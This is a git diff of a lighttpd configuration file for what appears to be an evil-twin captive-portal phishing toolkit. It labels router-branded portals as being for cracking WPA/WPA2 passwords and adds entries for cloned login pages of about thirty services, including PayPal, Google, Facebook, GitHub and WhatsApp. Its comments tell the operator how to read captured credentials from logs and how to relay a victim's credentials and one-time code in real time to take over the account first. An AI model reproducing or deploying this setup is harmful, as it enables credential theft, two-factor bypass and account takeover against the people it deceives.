lighttpd.conf: add new sites and update the config

--- a/cfg/lighttpd.conf
+++ b/cfg/lighttpd.conf
@@ -1,4 +1,4 @@
-# Captive Portal Site (see /var/www/captal/sites for examples)
+# Captive Portal Sites for cracking WPA/WPA2 passwords:
 #server.document-root = "/var/www/captal/sites/Adbepicentro_it.portal"
 #server.document-root = "/var/www/captal/sites/Alice_it.portal"
 #server.document-root = "/var/www/captal/sites/ARRIS_en.portal"
@@ -45,6 +45,61 @@ server.document-root = "/var/www/captal/sites/TP-LINK_en.portal"
 #server.document-root = "/var/www/captal/sites/ziggo1_nl.portal"
 #server.document-root = "/var/www/captal/sites/ziggo2_nl.portal"
 #server.document-root = "/var/www/captal/sites/Zyxel_it.portal"
+
+# Sites for sniffing credentials:
+#
+# Logs: See sniffed credentials in site path (/var/www/captal/site/*/log.txt)
+# TODO: log to syslog in parseable format with IP-address storing.
+#
+# When victim enter his credentials, you need to go to original website and use
+# those credentials to send real OTP to victim. Once he enter that OTP such OTP
+# will also be there with you and you will be allowed to login the account
+# before him.
+#
+# To see all logs, type 'tail -f /var/www/captal/sites/*/log.txt'.
+#
+# Don't forget to comment these settings at the end of this file:
+#
+## Redirect all traffic to the captive portal when not emulating a connection.
+#$HTTP["host"] != "captive.gateway.lan" {
+#    url.redirect-code = 302
+#    url.redirect  = (
+#        "^/(.*)" => "http://captive.gateway.lan/",
+#    )
+#}
+#------------------------------------------------------------------------------
+#
+#server.document-root = "/var/www/captal/sites/ajio"
+#server.document-root = "/var/www/captal/sites/amazonsign"
+#server.document-root = "/var/www/captal/sites/cryptocurrency"
+#server.document-root = "/var/www/captal/sites/ebay"
+#server.document-root = "/var/www/captal/sites/facebook"
+#server.document-root = "/var/www/captal/sites/flipcart"
+#server.document-root = "/var/www/captal/sites/github"
+#server.document-root = "/var/www/captal/sites/google"
+#server.document-root = "/var/www/captal/sites/hotstar"
+#server.document-root = "/var/www/captal/sites/instafollow"
+#server.document-root = "/var/www/captal/sites/instagram"
+#server.document-root = "/var/www/captal/sites/linkedin"
+#server.document-root = "/var/www/captal/sites/mobikwik"
+#server.document-root = "/var/www/captal/sites/Netflix"
+#server.document-root = "/var/www/captal/sites/ola"
+#server.document-root = "/var/www/captal/sites/paypal"
+#server.document-root = "/var/www/captal/sites/phonepay"
+#server.document-root = "/var/www/captal/sites/pinterest"
+#server.document-root = "/var/www/captal/sites/protonmail"
+#server.document-root = "/var/www/captal/sites/snapchat"
+#server.document-root = "/var/www/captal/sites/spotify"
+#server.document-root = "/var/www/captal/sites/stackoverflow"
+#server.document-root = "/var/www/captal/sites/telegram"
+#server.document-root = "/var/www/captal/sites/tiktok"
+#server.document-root = "/var/www/captal/sites/twitch"
+#server.document-root = "/var/www/captal/sites/twitter"
+#server.document-root = "/var/www/captal/sites/uber"
+#server.document-root = "/var/www/captal/sites/whatsapp"
+#server.document-root = "/var/www/captal/sites/wordpress"
+#server.document-root = "/var/www/captal/sites/zomato"
+
 
 server.modules = (
     "mod_access",
